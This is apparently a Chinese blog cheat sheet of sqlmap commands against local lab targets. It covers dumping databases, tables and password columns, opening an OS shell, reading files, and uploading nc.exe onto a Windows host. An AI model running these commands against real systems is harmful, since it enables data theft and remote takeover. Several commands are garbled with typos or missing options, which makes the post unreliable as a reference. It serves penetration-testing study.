基础使用
sqlmap.py -u "http://192,168.1.104/sq11/Less-1/?id=1&uid=2 "
文本中获取请求
sqlmap.py -r desktop/1.txt
查询数据库与表
sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id =1 --dbs
sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id =1 --D --tabls//-D 不指定具体数据库
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --current-db //当前网站使用的数据库
获取字段与内容
sqlmap.py -u "http://192.168,1.7/sq1/union.php?id=1" -D dkeye -T user info --columns
sqlmap.py-u"http://192.168,1.7/sq1/union.php?id=1" -D dkeye -T user info --c password,usernaems --dump
查询用户与密码
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1"
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1"
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1"
进阶使用
设置探测等级
--level 5
运行命令
sqlmap.py -u "http://192.168.1.7/sq1/union.php?id=1” --sq1-she1
读取或上传文件
http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read " C:/example.exe" -v1
python sqlmap.py -u " http://192.168.136.129/sq1map/mysq1/get int.aspx?id-1"
--file-write " /software/nc.exe.packed" --file-dest " C:/WINDOWS/Temp/nc.exe" -v 1
//1. `-v 1`: 这个参数设置 sqlmap 的详细级别为 1,即显示基本信息。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现